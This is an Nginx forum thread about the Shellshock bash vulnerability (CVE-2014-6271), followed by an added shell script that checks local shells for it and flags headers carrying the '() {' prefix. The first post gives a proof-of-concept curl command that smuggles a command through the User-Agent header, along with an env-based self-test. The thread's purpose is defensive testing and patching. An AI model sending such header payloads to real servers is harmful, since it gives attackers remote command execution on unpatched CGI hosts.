CVE-2014-6271 : Remote code execution through bash

hi list,

the following bug (Remote code execution through bash)
http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

might affect you if you use a shell/bash-based fcgi-wrapper like in
the following recipe: FCGI Wrap | NGINX /
http://wiki.nginx.org/FcgiwrapDebianInitScript
(did not test it); if someone runs a shell-based cgi-wrapper and would
like to test the POC from reddit, I'd be interested in the result :smiley:

curl -v -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa' http://example.com/path/to/file

At least I can confirm this affects bash-based CGIs.
ssh-based gitolite/gitlab et al. are affected too.

local self-test:

Output when vulnerable:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

Output when not vulnerable:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

additional references:

Advisory CVE-2014-6271: remote code execution through bash (oss-sec-ml)

Analysis 1 oss-sec ml

Analysis 2 / RedHat

Naxsi-WAF Signatures
http://blog.dorvakt.org/2014/09/ruleset-update-possible-remote-code.html

regards & happy patching
(and sorry for this slightly OT-post)

mex

Posted at Nginx Forum:

This could also be abused if you ever add any ENV variables that can
come from a user.

foo …

http://www.openwall.com/lists/oss-security/2014/09/24/17

"Note that on Linux systems where /bin/sh is symlinked to /bin/bash,
any popen() / system() calls from within languages such as PHP would
be of concern due to the ability to control HTTP_* in the env.

/mz"

$ ls -la /bin/sh
lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash

phew :slight_smile:

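The two posts above raise the same practical question from two sides: does the shell a CGI/fcgi wrapper (or PHP's popen()/system() via /bin/sh) starts execute the tail of a "() { :;}; ..." value that arrives through an HTTP_* environment variable, and what does /bin/sh on the box actually resolve to? The script below is an added example, not code from either post or from fcgiwrap, Naxsi or the Nginx project. It feeds the thread's payload to a shell through HTTP_USER_AGENT exactly as a wrapper would, classifies the result, reports the /bin/sh target, and shows the literal "() {" prefix check that the WAF rules key on. It assumes a POSIX sh plus grep, basename and readlink -f (any Linux box has them); the marker string and the header samples are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the thread): probe a shell the way a CGI wrapper
# exposes it to Shellshock, report the /bin/sh target, and recognise the
# payload prefix in a header line. The payload only echoes a marker; it
# writes nothing to disk.

MARKER='SHELLSHOCK_MARKER'   # constructed marker, any unlikely string works

# probe_shell SHELL -> prints "vulnerable", "patched" or "missing".
# HTTP_USER_AGENT stands in for the header value the wrapper exports; the
# shell is asked to run only ':' so the marker can come only from the
# environment import. Exit status: 0 patched, 1 vulnerable, 2 missing.
probe_shell() {
    shell=$1
    command -v "$shell" >/dev/null 2>&1 || { echo missing; return 2; }
    # an assignment in front of the command exports the payload to that
    # process only; stderr is dropped so a patched bash's warning is ignored
    out=$(HTTP_USER_AGENT="() { :;}; echo $MARKER" "$shell" -c ':' 2>/dev/null)
    case $out in
        *"$MARKER"*) echo vulnerable; return 1 ;;
        *)           echo patched;    return 0 ;;
    esac
}

# sh_target -> prints the basename /bin/sh resolves to (dash, bash, ...),
# "sh" if it is a regular file, or "missing" if there is no /bin/sh.
# This is the check the second post does by hand with ls -la.
sh_target() {
    if [ -L /bin/sh ]; then
        basename "$(readlink -f /bin/sh)"
    elif [ -e /bin/sh ]; then
        echo sh
    else
        echo missing
    fi
}

# header_is_shellshock 'Name: value' -> 0 if the header value starts with
# the literal four-character prefix "() {" that bash's importer looked for
# (leading whitespace after the colon is tolerated), else 1. Anything that
# does not carry this prefix cannot trigger the import path at all.
header_is_shellshock() {
    value=${1#*:}
    printf '%s' "$value" | grep -q '^[[:space:]]*() {'
}

# Stand-alone run: report each shell found, the /bin/sh target, and the
# classification of the curl payload from the first post.
for s in bash dash sh; do
    printf '%-5s %s\n' "$s" "$(probe_shell "$s")"
done
printf '/bin/sh -> %s\n' "$(sh_target)"
if header_is_shellshock 'User-Agent: () { :;}; echo aa>/tmp/aa'; then
    echo "curl payload from the thread: carries the Shellshock prefix"
fi
```

Run it as `sh probe.sh` on the host that runs the wrapper. A "vulnerable" line next to bash means that host honours the import and every HTTP_* header reaching a bash-based CGI is a command line; a "patched" line next to sh together with "/bin/sh -> dash" is the situation the second post ends on, where popen()/system() callers are not exposed even while bash itself is unpatched. The prefix check is deliberately as strict as bash's own test (exactly "() {"), so it matches what can fire, not every string containing parentheses.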